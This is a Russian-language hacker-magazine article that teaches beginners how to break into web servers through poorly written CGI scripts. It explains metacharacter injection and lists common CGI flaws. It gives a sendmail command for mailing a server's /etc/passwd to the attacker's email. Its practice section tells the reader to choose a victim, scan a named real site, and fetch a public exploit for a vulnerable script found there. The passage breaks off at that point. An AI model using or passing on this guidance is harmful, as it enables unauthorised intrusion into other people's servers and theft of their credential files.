ДЕТСКИЙ ВЗЛОМ - ищем бажную CGI

Скрыпников Сергей aka Slam

Спецвыпуск Xakep, номер #025, стр. 025-026-2

Общая цель CGI-скриптов - позволить тебе получать доступ лишь к определенной части информации, находящейся на сервере. Такое определение сразу должно навести тебя на мысли о том, что ты можешь каким-то способом получить доступ и ко всей информации на сервере. Ни один сервак нельзя считать на 100% защищенным (ломают и ***.gov). Наиболее часто встречающаяся уязвимость - это отсутствие проверки посылаемых скрипту данных на метасимволы (такие, к примеру, как & ; ` ' \ " | * ? ~ < > ^ ( ) [ ] { } $ ), что приводит к выводу скриптом содержимого файла или самого файла. Элементарным решением этой проблемы есть фильтрация вводимого набора символом, выглядящая на Perl следующим образом:

$in =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"\n])/\\$1/g;

Мне кажется, люди, которые пишут скрипты, - совсем ленивые и забывают об этом или не хотят запоминать, т.к. самую элементарную проверку на символы "/" и ".." до сих пор не делают, а потом, однажды зайдя на свой сервак, видят "][/-\|<ED by ...".

Думаю, теперь ты немного представляешь себе работу сервера и CGI-скриптов. Настало время объяснить тебе, что такое эксплойт. Эксплойт ("калька" с английского "exploit") - это уязвимость, для которой разработан конкретный метод атаки. Многие эксплойты публикуются в открытых источниках, и рано или поздно для них создаются "заплатки" (патчи), устраняющие уязвимость. Будем надеяться, что админ того сайта, который ты хочешь сломать, ленивый и не будет ставить никаких патчей. Скажу сразу, что самыми распространенными ошибками являются:

1. Выполнение команды.

2. Чтение файла.

3. Запуск программ.

4. Ошибки sendmail.

5. DoS атака на скрипт.

Ошибка в sendmail поможет тебе овладеть серваком так.

Запуск sendmail: sendmail -f sergey@soobcha.org, Hi, pipiska.txt. Эта команда отправит на мое мыло файл pipiska.txt. Естественно, вместо pipiska.txt лучше заказать файл /etc/passwd :).

ПРАКТИКА

Итак, надеюсь, ты уже достаточно теоретически подготовлен и теперь сможешь сделать что-нибудь более или менее полезное.

Сначала ты должен определиться с тем, нужно ли тебе это или нет? Если нужно, то выбирай себе жертву, только хочу сразу предупредить: не пытайся ломать всякие www.vvp.ru и www.nasa.gov, т.к. отделение "Р" в нашей стране не спит, а ты потом все свалишь на меня :). Если жертва уже выбрана, то иди и качай CGI-сканер. Ты не знаешь, что это такое? Тогда тебе в Спец №11(22), там я давал сравнительный обзор самых юзаемых и удобных CGI - чекеров. Я буду показывать тебе все на примере VoidEye2k.

Значит, с настройками ты и сам разберешься, интерфейс понятен и младенцу. Задаем сервак и ждем несколько минут ;). Итак, при сканировании на www.kronex.ru найден скрипт tigvote.cgi. "Ну и что?" - скажешь ты. А то, что теперь бегом на www.void.ru, ищи там статью "CGI-ЖУКС - подробно и по-русски" и ищи там эксплойт. Читаем: